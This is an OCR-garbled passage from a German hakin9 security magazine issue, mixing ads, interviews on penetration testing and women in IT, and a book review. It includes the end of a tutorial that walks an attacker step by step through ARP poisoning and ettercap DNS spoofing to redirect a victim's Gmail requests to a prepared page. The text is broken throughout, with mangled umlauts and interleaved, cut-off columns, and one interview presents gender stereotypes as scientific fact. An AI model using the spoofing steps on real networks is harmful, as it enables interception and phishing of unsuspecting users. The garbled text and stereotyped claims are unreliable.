wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
